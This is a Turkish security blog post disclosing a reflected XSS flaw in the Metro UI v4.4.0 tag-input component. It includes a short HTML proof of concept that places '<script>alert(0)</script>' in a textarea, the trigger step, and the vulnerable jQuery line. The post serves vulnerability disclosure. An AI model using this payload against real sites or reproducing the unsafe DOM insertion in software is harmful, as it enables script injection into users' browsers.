|

Metro UI v4.4.0 Components Library Reflected XSS Injection



alicangonullu tarafından 2022-09-23 18:38:30 tarihinde yazıldı. Tahmini okunma süresi 51 saniye. 1399 kere görüntülendi.




Disclaimer


The information provided in this blog post is intended for educational and informational purposes only. It is not intended to encourage or promote any illegal or unethical activities, including hacking, cyberattacks, or any form of unauthorized access to computer systems, networks, or data.

Yasal Uyarı
Bu blog yazısında sağlanan bilgiler yalnızca eğitim ve bilgilendirme amaçlıdır. Bilgisayar korsanlığı, siber saldırılar veya bilgisayar sistemlerine, ağlara veya verilere herhangi bir şekilde yetkisiz erişim de dahil olmak üzere herhangi bir yasa dışı veya etik olmayan faaliyeti teşvik etme veya reklamlama amacı taşımaz.
Yasal bilgiler için yasal sayfasını inceleyebilirsiniz .

# Exploit Title:  Metro UI v4.4.0 Components Library Reflected XSS Injection
# Date: 09-19-2022
# Exploit Author: Ali Can Gonullu / Defans Security, Turkey
# Vendor Homepage: https://metroui.org.ua/intro.html
# Software Link: https://metroui.org.ua/intro.html
# Version: v4.4.0-v4.5.x (REQUIRED)
# Tested on: Windows 10 x64
# Video :  https://youtu.be/_wzGVpX54Rc 
 
PoC :
<head>
<title>Exploit PoC</title>
<link rel="stylesheet" href="https://cdn.korzh.com/metroui/v4.5.1/css/metro-all.min.css">
<script src="https://cdn.korzh.com/metroui/v4.5.1/js/metro.min.js"></script>
</head>


<body>
<textarea data-role="taginput" name="kuralicerik" cols="60" rows="10"><script>alert(0)</script>,</textarea>
</body>
Write exploit code to textarea and touch to comma button
Exploit Code :
 
That textarea triggering to a javascript code
Vulnerable code : container = $("<div>").addClass("tag-input "  + element[0].className).addClass(o.clsComponent).insertBefore(element);
element.appendTo(container);